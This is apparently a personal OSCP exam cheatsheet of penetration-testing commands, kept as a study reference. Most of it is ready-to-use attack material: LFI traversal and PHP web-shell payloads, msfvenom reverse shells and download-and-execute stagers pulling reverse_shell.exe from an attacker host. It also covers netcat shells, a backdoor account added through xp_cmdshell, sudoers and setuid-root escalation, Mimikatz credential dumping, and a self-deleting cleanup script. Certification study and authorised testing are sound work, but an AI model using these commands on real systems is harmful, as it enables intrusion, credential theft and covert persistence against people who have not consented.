OSCP Cheatsheet #

This was the cheatsheet and containing the methodologies that were compiled when I took my OSCP.

I just left this as is and made a bigger cheatsheet on top of this, which is this site.

OSINT #

GDorks
Open up the social media accounts

Reconnaissance #

nmap -sP $subnet -oA sP-$subnet
nmap -sS $host -oA sS-$rhost
nmap -A -p $ports -oA A-$rhost
nmap -sS -T4 -p- $host -oA -sS-T4-p-$rhost
nmap -sC -T4 $host  -oA sC-T4-$host  nmap -sT -T4 $host -oA sT-T4-$rhost  nmap -sA -T4 $rhost -oA sA-T4-$rhost 
unicornscan -v -m U -p all $rhost unicornscan-udp-$rhost
python3 autorecon.py $rhost

More NMAP #

NOTE: Just use naabu from Project Discovery for basic TCP port scanning

1	`sudo ~/go/bin/naabu -stats -verify -l hosts.txt -output output.txt`

Another alternative (Massscan)

1	`sudo masscan -p 0-65535 --open -iL hosts.txt -oG output.txt\|tee -a output_backup.txt`

Speeding up NMAP (arguments)

1	`-T4 --max-rtt-timeout 200ms --max-retries 1 --max-scan-delay 10ms --min-hostgroup 64 --version-intensity 1`

Resume NMAP scan

1 2	`# Which is why it is import to do -oX or -oA nmap --resume previous_cancelled_output.xml`

Network #

SNMP:

1 2	`snmp-check $rhost snmpwalk -v $snmpVersion -c $snmpComString $rhost`

RPC:

enum4linux $rhost
python ridenum.py $rhost 1 50000 
# Note Max: 100 range only. duplicate py and edit, add on line #97 sid="S-1-5-21-3001938989-124212845-530053634", get the sid from rpcclient manually using command lookupnames root or administrator
rpcclient -U "" $rhost
smbtree $rhost

NFS:
1
showmount -e $rhost

SMB/SAMBA:

#!/bin/sh
#Author: rewardone
#Thanks fellow student OS-40285!
#
#Description:
# enum4linux messed up and doesnt report samba version.
# 
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: $0 <ipaddress> <port>" && exit; else rhost=$1; fi 
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & 
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

1	`for i in $(ls /usr/share/nmap/scripts\|grep smb-vuln-); do echo ==================== && echo [+] $i && echo ==================== && nmap --script $i -p 139,445 $rhost;done`

1	`nmap -v -sV -p 139,445 --script="smb-vuln-*" $rhost`

FTP:

1	`nmap -b anonymous:anonymous@$rhost $rhost -p- -Pn`

TCPDUMP:

1	`tcpdump -A -XX -vvv -n -i eth0 src $rhost`

Databases #

TNSListener
MySQL: Executing shell on windows from db:³¹
- HackMag³²

MSSQL:

1	`nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse $rhost -p1433 --script-args mssql.username=sa,mssql.password=$password,ms-sql-xp-cmdshell.cmd="net user backdoor backdoor123 /add"`

MSSQL:

(From Impacket)

1	`./mssqlclient.py sa:password@$rhost -p 1433`

Web #

1 2	`wafw00f http://$rhost nikto -h $url -C all -oX`

Directory:

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u https://gg.example.com/FUZZ -recursion -recursion-depth 3 -recursion-strategy greedy -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4674.0 Safari/537.36" -o output
gobuster dir -w $dirlist -u http://$rhost -l -t 50 (l for size,t for threads)
dirbuster -l /usr/share/wordlists/dirbuster/directory-list-1.0.txt =R  -s / -t 40 -r ./dirbuster-$host -u http://$host (Turn off "recursive"  adjust threads to 30-45)
cat ~/Results/naabu/naabu_all_ports_withoutIPs_https.txt | ~/Tools/feroxbuster --stdin --parallel 10 -e -A -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -o ~/Results/feroxbuster/naabu_raft-large-directories.txt
skipfish -YO http://$rhost:$rport -o skipfish_output
wget -r http://$rhost:$rport -o wget_output
# BurpSuite - Spider from Results of dirbuster

Webdav Test
1 2
davtest -url $url cadaver $url:80

LFI:

1
2
3

http://$url/index/../../../../etc/passwd
$url/index/../../../../etc/passwd%00
\n \r

Bypass Sanitation:

$url/index/2E%2E%%2F%2E%2E%%2F%2E%2E%%2F%2E%2E%%2Fetc%2Fpasswd
$url/index/..\/..\/..\/..\/etc\/passwd
$url/index/..//..//..//..//etc//passwd
$url/index/..///..///..///..///etc///passwd
# http://www.vulnerability-lab.com/resources/documents/587.txt

1
2

dotdotpwn -m http-url -u http(s)://$rhost:$rport/$somepage.php?$page=TRAVERSAL -k $word (root if linux, find if MS) 
LFI_Scanner.py (https://github.com/monkeysm8/CTF-Stuff/blob/master/LFI_Scanner.py)

LFI to RCE:
- To try first before the proc/self/fd/$numberToFigureOut: Proc/self/environ
  1
  https://$url/$directory/$somephp.php?$phpfunction=../../../../../../../../../proc/self/fd/$numberFromFDsizeFindOutfromProcSelfStatus(number usually 0-32)
- paste the following in User-Agent Burp: <?php system($_GET['cmd']); ?> then access 1st url in this line/section then add =$command at the end ²⁷²⁸
- Another version of above. Input <?php system($_GET[‘cmd’]); ?> in URL first then access the access or error log
- Go through this link one by one ²⁹³⁰

PUT:

UPLOAD:

1	`curl --upload-file php-reverse-shell.txt -v --url http://$rhost/$dir/reverse_shell.php -0 --http1.0`

Adobe Coldfusion: https://nets.ec/Coldfusion_hacking

SQLi:

1	`nmap -sV -p $rport --script=http-sql-injection $rhost`

WFUZZ:

Directory:

wfuzz -v -c  -w $wordlist -u $url/FUZZ -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie_Field" -f wfuzz_results.txt #(put FUZZ wherever you want to)

SQLi:

wfuzz -v -c  -w /usr/share/wordlists/wfuzz/Injections/SQL.txt -u $url/index.php?id=FUZZ -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie_Field" -f wfuzz_results.txt

Wordlists
- Seclists
- FuzzDB

BRUTEFORCE:

MULTIPLE:

wfuzz -v -c  -w $wordlist_username -w $wordlist_password -u $url/login.php -d "username=FUZZ=FUZ2Z" -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie-Field" -f wfuzz_results.txt

SINGLE:

wfuzz -v -c  -w $wordlist -u $url/login.php -d "username=admin=FUZZ" -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie-Field" -f wfuzz_results.txt

WORDPRESS:

wpscan --url http://$rhost
wpscan --url http://$rhost --enumerate u
wpscan --url http://$rhost --wordlist /usr/share/wordlists/rockyou-10k.txt --user admin
nmap -sV --script=http-wordpress-brute --script-args 'userdb=/root/Downloads/user.txt,passdb=/usr/share/wordlists/rockyou-10k.txt,http-wordpress-brute.threads=3,brute.firstonly=true' $rhost

Dashboard to RCE Shell: Pentaroot

Brute Forcing Online #

cewl $url -m 6 -w $url.txt

Edit /etc/john/john.conf and add the lines below to the end

20$[0-2]$[0-9]
19$[5-9]$[0-9]
$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]

john --wordlist=cewl-$url.txt --rules --stdout cewl-johnMutated-wordlist-$url.txt

SSH/FTP/MSSQL:

1	`hydra -t 4 -l $username -P $wordlist $rhost $protocol(ssh/ftp/mssql)[common usernames: mssql=sa,ssh=root,ftp=anonymous/root,]`

RDP:

1	`ncrack -u $username -P $wordlist $rhost:$rport`

WEB:

1	`medusa -h $url -u admin -P cewl-johnMutated-wordlist-$url.txt -M http -m DIR:/(where the login is) -T 10`

BurpSuite

HTTP-BasicAuth:

1	`hydra -t 4 -L $username-wordlist -P cewl-johnMutated-wordlist-$url.txt $rhost -s $rport http-get /$rpath`

SMB:

1	`hydra -l $username -P $wordlist.txt $rhost smb -V`

Exploitation #

exploit-db.com
Security Focus
CVE details
Github
Google
Compilation: i686-w64-mingw32-gcc -lws2_32 $filename.c -o $filename.exe

Initial Shell Checks #

Windows:

1	`hostname & whoami /all & ipconfig & systeminfo & net user & net localgroup & net user /domain & tasklist /V`

Linux:

1	`hostname && whoami && id && w && ifconfig && cat /etc/release && uname -a && env && export -p && sudo -l`

Find in Windows:

1	`dir /s $driverletter:\$filenameorpattern - i.e.(dir /s c:\proof.txt)`

Find in Unix:
1
find / -name $filenametofind

Shells #

Try to use empire instead of metasploit for post exploitation and reverse shell

MSFVENOM:

1	`msfvenom -p windows/shell_reverse_tcp LHOST=$lhost LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o reverse_shell.exe`

WGET-Win-PS1:

echo $storageDir = $pwd  wget.ps1
echo $webclient = New-Object System.Net.WebClient wget.ps1
echo $url = "http://$lhost:8000/reverse_shell.exe" wget.ps1
echo $file = "reverse_shell.exe" wget.ps1
echo $webclient.DownloadFile($url,$file) wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

WGET-Win-VBS:

echo strUrl = WScript.Arguments.Item(0)  wget.vbs
echo StrFile = WScript.Arguments.Item(1)  wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0  wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0  wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1  wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2  wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts  wget.vbs
echo Err.Clear  wget.vbs
echo Set http = Nothing  wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1")  wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")  wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")  wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")  wget.vbs
echo http.Open "GET", strURL, False  wget.vbs
echo http.Send  wget.vbs
echo varByteArray = http.ResponseBody  wget.vbs
echo Set http = Nothing  wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject")  wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True)  wget.vbs
echo strData = ""  wget.vbs
echo strBuffer = ""  wget.vbs
echo For lngCounter = 0 to UBound(varByteArray)  wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))  wget.vbs
echo Next  wget.vbs
echo ts.Close  wget.vbs
cscript wget.vbs http://$lhost:8000/reverse_shell.exe reverse_shell.exe

WGET-Windows-FTP:

echo open $lhost 21 ftp.txt
echo USER anonymous ftp.txt
echo anonymous ftp.txt
echo bin  ftp.txt
echo hash  ftp.txt
echo GET reverse_shell.exe  ftp.txt
echo bye  ftp.txt
ftp -v -n -s:ftp.txt

WGET-Python:

1	`python -c "import urllib; urllib.urlretrieve ('http://$url:8000/$filename', 'C:\$filename')"`

Hosting-HTTP:
1
python3 -m http.server

Hosting-FTP:

1	`python -m pyftpdlib -p 21(pip install pyftpdlib)`

Privilege Escalation - Linux #

linuxprivchecker.py ¹
linux-local-enum.sh²
LinEnum.sh ³

Pspy:

1	`./pspy64 -pf -i 1000 -c (Run this in another terminal/shell right after enum scripts)`

Check for writable folders:

for directory1 in $(ls -lR 21 / | grep -v "Permission" |grep dr|grep xrw|grep -v "drwxrwxr-x"|grep -v driver|grep -v drv|grep -v ""|awk '{print $9}'); do for directory2 in $(find / -name $directory1 21|grep -v "Permission"); do ls -ld $directory2|grep xrw|grep -v ""; done; done

* ADD to sudoers command:

1 2	`echo '#!/bin/bash' /tmp/addMeToSUDOERS echo 'echo "www-data ALL=NOPASSWD: ALL" /etc/sudoers && chmod 440 /etc/sudoers' /tmp/addMeToSUDOERS`

* ADD to sudoers command: * ALTERNATIVE to ABOVE:

int main(void)
{ 
setgid(0);
setuid(0);
execl("/bin/sh", "sh", 0); 
}
# Compile with: `gcc test.c -o test`

#!/bin/bash
chown root /tmp/test 
chgrp root /tmp/test
chmod u+s /tmp/test

* OUT_OF_IDEAS?: dpkg -l and check versions with exploit-db * STILL OUT?: Follow g0tm1lk ⁴

Privilege Escalation - Windows #

WindowsPrivCheck.bat ²⁴²⁵(requires accesschk.exe)

1	`powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadFile('http://$lhost:$lport/WinPrivCheck.bat','WinPrivCheck.bat');"`

1	`powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadFile('http://$lhost:$lport/accesschk.exe','accesschk.exe');"`

windows-privesc-check2.exe
- 1
  windows-privesc-check2.exe -A --dump

Check for missing patches:

WMIC:

1	`wmic qfe get Caption,Description,HotFixID,InstalledOn`

POTATO: by foxglovesec:

1	`start /b Potato.exe -ip 10.11.1.218 -cmd "C:\\temp\\rev.exe" -disable_exhaust true`

With Powershell

PowerSploit-PowerUp.ps1:

1	`powershell -exec bypass -windowstyle hidden -command "IEX (New-Object System.Net.Webclient).DownloadString('http://$lhost:$lport/PowerUp.ps1');Invoke-AllChecks"`

PowerSploit-PowerUp.ps1:
- In PowerShell Exec BypassMode:
  - Import-Module .\PowerUp.ps1 \r\n then in another line Invoke-AllChecks
PowerUp.ps1:
- Write-UserAddMSI (if installedAlwaysElevated in On)

Sherlock:

1	`powershell -exec bypass -windowstyle hidden -command "IEX (New-Object System.Net.Webclient).DownloadString('http://$lhost:$lport/Sherlock.ps1');Find-AllVulns"`

JAWS:²⁶

1	`CMD C:\temp powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt`

POTATO: PS: Tater by Kevin Robertson
Find SSH,RDP Creds: SessionGopher by FireEye
Empire Privilege Escalation
Also check wadcoms

To NTAUTHORITY

Escalating to NTAUTHORITY\System:

1	`psexec.exe -accepteula -s -u $username cmd`

Escalating to NTAUTHORITY\System (w/rdp):

1	`psexec.exe -accepteula -s -u $username -p $password nc $lhost $lport C:\Windows\System32\cmd.exe`

Escalating to NTAUTHORITY\System (w.o./rdp):

1	`psexec.exe -accepteula -i -s C:\dir\dir\nc.exe $lhost $lport -e C:\windows\system32\cmd.exe`

Escalating to NTAUTHORITY\System:

1	`runas nc $lhost $lport C:\Windows\System32\cmd.exe`

Privilege Escalation Exploits #

LINUX: Ubuntu 11.04/11.10 or Linux Kernel 2.6.39 3.2.2 which covers 3.0.0 too BTW Memmodipper ⁵
LINUX: DirtyCow: Ubuntu 12.04 LTS ,Ubuntu 14.04 LTS (Linux Mint 17.1),Debian 8 ,Ubuntu 16.04 LTS ,Ubuntu 16.10 ,RHEL 7, CentOS 7 ,RHEL 6, CentOS 6 ,RHEL 5, CentOS 5
LINUX: CHKROOTKIT: 0.49 ⁶

Dumping Credentials #

Mimikatz: Either PS Empire, Meterpreter, or direct download of exe file ⁷

Mimikatz:

Binary:

log
privilege::debug
sekurlsa::logonPasswords
lsadump::sam
lsadump::secrets
lsadump::cache
vault::cred
vault:list

wce.exe -w ⁸
fgdump.exe ⁹

Network Pivoting #

Windows:

Plink:

1	`plink $lhost -P 22 -C -R 127.0.0.1:$lport:$rhost:$rport`

Linux:
- Proxychains: *
  1
  ssh -D 127.0.0.1:$lport -p 22 $ruser@pivot-target-ip
  - (Add socks4 127.0.0.1 $lport in /etc/proxychains.conf)
  - [all_cmds_on_kali]
    1
    ssh -D $proxychainsport -p 22 $ruser@$rhost
    - (Add in last line in /etc/proxychains.conf: socks4 127.0.0.1 $proxychainsport )
    - proxychains [command )i.e. nmap . ..)]

OSCP Post Checks #

Windows:
- Plink:
  1
  plink $lhost -P 22 -C -R 127.0.0.1:$lport:$rhost:$rport
- CREDENTIALS DUMP(mimikatz,wce,fgdump) then
  1
  systeminfo & ipconfig & route print & arp -a & dir /s network-secret.txt & dir /s *pass* & psloggedon.exe -accepteula
- ProxyChains:
  - proxychain via ssh to target then:
    - proxychains /root/Tools/post_checks.sh
- [all_cmds_on_kali]
  1
  ssh -D $proxychainsport -p 22 $ruser@$rhost
  - (Add in last line in /etc/proxychains.conf: socks4 127.0.0.1 $proxychainsport )
  - proxychains [command )i.e. nmap . ..)]
- Enable RDP:⁹

Linux:

1	`ls /root && cat /root/proof.txt && find / -name network-secret.txt && cat /etc/shadow && route -n && arp -a && ifconfig && netstat -plunt && w`

House Cleaning #

Generic - Remove Reverse Shells
Generic - Remove Reverse Meterpreter
Generic - Remote Accounts
Web - Reverse/Bind PHP files
Web - Remove Reflected XSS Entries
Windows - Remove Task Scheduler
Windows - Remove Registry
Windows - Remove Startup Folder
Linux - Remove Crontab entries
Linux - Remove Cron.d entries
Linux - Remove rc.local entries
Linux - Remove /etc/init.d/ entries
Linux - Remove Sysctl entries
Phishing - Removal of Phishing email
Malware - Activate Kill Switch
Malware - Cleanup manually

Self Deleting Batch Command:

echo timeout /t 60 >>  cleanupselfdelete.bat
echo del reverse_shell.exe >> cleanupselfdelete.bat
echo ^(goto^) 2^nul ^ del ^"%~f0^" >> cleanupselfdelete.bat
start cleanupselfdelete.bat

CheatSheets #

Common Commands ¹⁰
Pentest Monkey¹¹
UPDATE January 2021: This cheatsheet!

Other Resources #

VA-UK¹²
Password List¹³
Escaping Shell¹⁴

OSCP Resources #

Noobpad ¹⁵
Sec Juice¹⁶
scund00r¹⁷
backdoorshell¹⁸
0xc0ffee¹⁹
swisskyrepo²⁰
ihack4falafel²¹
kevsec²²
futureoscp²³

Last update: April 28, 2022